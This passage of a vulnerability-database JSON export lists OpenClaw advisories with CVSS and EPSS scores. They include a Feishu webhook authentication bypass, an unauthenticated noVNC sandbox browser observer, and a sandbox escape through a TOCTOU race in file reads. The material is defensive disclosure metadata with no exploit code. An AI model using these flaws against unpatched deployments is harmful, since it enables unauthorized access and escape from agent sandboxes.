U/C:L/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/f45e5a6569aab1d58cc6de25b19f1dc4c8779b85","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/f45e5a6569aab1d58cc6de25b19f1dc4c8779b85"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-877v-w3f5-3pcq","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-877v-w3f5-3pcq"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41406","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41406"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-sender-allowlist-bypass-via-thread-history-and-quoted-messages","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-sender-allowlist-bypass-via-thread-history-and-quoted-messages"},{"reference_url":"https://github.com/advisories/GHSA-877v-w3f5-3pcq","reference_id":"GHSA-877v-w3f5-3pcq","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-877v-w3f5-3pcq"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41406","GHSA-877v-w3f5-3pcq"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-xryt-a83q-q7et"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90078?format=json","vulnerability_id":"VCID-xsct-xjs7-nbab","summary":"OpenClaw: Feishu webhook and card-action validation now fail closed\n## Summary\n\nFeishu webhook mode accepted missing `encryptKey` configuration as valid and blank card-action callback tokens as usable lifecycle tokens. Together, those fail-open paths could allow unauthenticated webhook or card-action traffic to reach command dispatch in affected deployments.\n\n## Impact\n\nA deployment using Feishu webhook mode without a configured `encryptKey`, or handling malformed card-action callbacks with blank callback tokens, could fail open instead of rejecting the request. Severity remains critical because affected webhook deployments expose a network-triggered path into OpenClaw command handling without the expected Feishu signature or replay protection.\n\n## Affected versions\n\n- Affected: `< 2026.4.15`\n- Patched: `2026.4.15`\n\n## Fix\n\nOpenClaw `2026.4.15` makes Feishu webhook and card-action validation fail closed. Webhook mode now refuses to start without an `encryptKey`, missing signing configuration returns invalid instead of valid, invalid signatures return `401`, and blank card-action callback tokens are rejected before dispatch.\n\nVerified in `v2026.4.15`:\n\n- `extensions/feishu/src/monitor.transport.ts` returns invalid when `encryptKey` is missing, refuses webhook mode without `encryptKey`, and rejects invalid signatures before JSON handling.\n- `extensions/feishu/src/card-action.ts` rejects blank callback tokens in the card-action lifecycle guard.\n- `extensions/feishu/src/monitor.webhook-security.test.ts` covers missing-`encryptKey` startup and transport rejection.\n- `extensions/feishu/src/monitor.card-action.lifecycle.test.ts` covers malformed blank-token card actions being dropped before handler dispatch.\n\nFix commit included in `v2026.4.15` and absent from `v2026.4.14`:\n\n- `c8003f1b33ed2924be5f62131bd28742c5a41aae` via PR #66707\n\nThanks to @dhyabi2 for reporting this issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44109","reference_id":"","reference_type":"","scores":[{"value":"0.00184","scoring_system":"epss","scoring_elements":"0.3993","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00184","scoring_system":"epss","scoring_elements":"0.39934","published_at":"2026-06-06T12:55:00Z"},{"value":"0.002","scoring_system":"epss","scoring_elements":"0.42032","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44109"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/c8003f1b33ed2924be5f62131bd28742c5a41aae","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-05-07T12:34:48Z/"}],"url":"https://github.com/openclaw/openclaw/commit/c8003f1b33ed2924be5f62131bd28742c5a41aae"},{"reference_url":"https://github.com/openclaw/openclaw/pull/66707","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/66707"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-xh72-v6v9-mwhc","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-05-07T12:34:48Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-xh72-v6v9-mwhc"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44109","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44109"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-authentication-bypass-in-feishu-webhook-and-card-action-validation","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-05-07T12:34:48Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-authentication-bypass-in-feishu-webhook-and-card-action-validation"},{"reference_url":"https://github.com/advisories/GHSA-xh72-v6v9-mwhc","reference_id":"GHSA-xh72-v6v9-mwhc","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-xh72-v6v9-mwhc"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109881?format=json","purl":"pkg:npm/openclaw@2026.4.15","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.15"}],"aliases":["CVE-2026-44109","GHSA-xh72-v6v9-mwhc"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-xsct-xjs7-nbab"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91859?format=json","vulnerability_id":"VCID-xux6-be95-e7ec","summary":"Duplicate Advisory: OpenClaw's andbox browser noVNC observer lacked VNC authentication\n## Duplicate Advisory\n\nThis advisory has been withdrawn because it is a duplicate of GHSA-25gx-x37c-7pph. This link is maintained to preserve external references.\n\n## Original Description\nOpenClaw versions prior to 2026.2.21 sandbox browser entrypoint launches x11vnc without authentication for noVNC observer sessions, allowing unauthenticated access to the VNC interface. Remote attackers on the host loopback interface can connect to the exposed noVNC port to observe or interact with the sandbox browser without credentials.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/621d8e1312482f122f18c43c72c67211b141da01","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/621d8e1312482f122f18c43c72c67211b141da01"},{"reference_url":"https://github.com/openclaw/openclaw/commit/8c1518f0f3e0533593cd2dec3a46c9b746753661","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/8c1518f0f3e0533593cd2dec3a46c9b746753661"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-missing-vnc-authentication-in-sandbox-browser-novnc-observer","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-missing-vnc-authentication-in-sandbox-browser-novnc-observer"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32064","reference_id":"CVE-2026-32064","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32064"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-25gx-x37c-7pph","reference_id":"GHSA-25gx-x37c-7pph","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-25gx-x37c-7pph"},{"reference_url":"https://github.com/advisories/GHSA-cxcw-jm67-3wwp","reference_id":"GHSA-cxcw-jm67-3wwp","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cxcw-jm67-3wwp"}],"fixed_packages":[],"aliases":["GHSA-cxcw-jm67-3wwp"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-xux6-be95-e7ec"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89722?format=json","vulnerability_id":"VCID-xvhd-w4tv-tqhr","summary":"OpenClaw: Sandbox escape via TOCTOU race in remote FS bridge readFile\n## Summary\nSandbox escape via TOCTOU race in remote FS bridge readFile\n\n## Current Maintainer Triage\n- Normalized severity: critical\n- Assessment: v2026.3.28 remote sandbox reads still do path-check then separate file read, so the TOCTOU sandbox escape remains present in the latest shipped tag.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `121870a08583033ed6a0ed73d9ffea32991252bb` — 2026-03-31T09:55:51+09:00\n\nOpenClaw thanks @AntAISecurityLab for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41296","reference_id":"","reference_type":"","scores":[{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.10948","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.10981","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.1099","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41296"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N"},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/121870a08583033ed6a0ed73d9ffea32991252bb","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N"},{"value":"8.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N"},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T16:02:53Z/"}],"url":"https://github.com/openclaw/openclaw/commit/121870a08583033ed6a0ed73d9ffea32991252bb"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N"},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-9p3r-hh9g-5cmg","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N"},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T16:02:53Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-9p3r-hh9g-5cmg"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41296","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N"},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41296"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-sandbox-escape-via-toctou-race-in-remote-fs-bridge-readfile","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N"},{"value":"8.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N"},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T16:02:53Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-sandbox-escape-via-toctou-race-in-remote-fs-bridge-readfile"},{"reference_url":"https://github.com/advisories/GHSA-9p3r-hh9g-